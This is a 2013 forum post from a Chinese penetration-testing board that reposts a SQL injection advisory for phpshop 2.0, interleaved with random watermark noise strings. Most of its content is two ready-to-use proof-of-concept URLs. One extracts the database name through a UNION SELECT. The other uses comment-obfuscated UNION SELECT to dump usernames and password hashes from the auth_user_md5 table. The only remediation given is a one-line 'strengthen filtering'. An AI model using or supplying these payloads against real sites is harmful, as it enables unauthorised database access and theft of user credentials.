中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
S! v5 Z0 h/ t+ z- V& H
0 t( w* r& V* i* j
作者 : By onestree
% q" \2 i8 u# F
下载地址 :
http://code.google.com/p/phpshop/downloads/list
9 R7 a. q6 a0 ]' {0 T1 q, D5 Q( E
测试地址: windows 7 / ubuntu
+ {/ T2 u2 m" a& _+ U6 A5 |9 a
4 E+ D1 S) D' ?6 k! W
/ o, j0 m9 ]# s3 k' H* ?
SQLi p0c:
+ W7 p+ {/ i0 C5 U7 q3 }* q# p
' w$ z6 [! }/ [) C- G1 C# ], x3 M
==================
, } D% D3 g' f5 `% W4 f
/ }, Q0 }) c, L- v( D5 D
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
) g9 v% P1 \2 Q) q% G, f
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
4 T8 R% f* ?5 k: Y" z; Y% a4 a
' l2 p1 a* D$ o
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
+ {# ~6 U9 i. i1 D9 A
2 M( k1 k. `' R, m7 n" _
修复:
; B/ E& L' W) {
加强过滤
+ m7 K" I' @1 M9 c
A2 C! i, f6 _/ o6 r. f# V
( ~7 n" S- F2 F7 e1 P! q$ A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2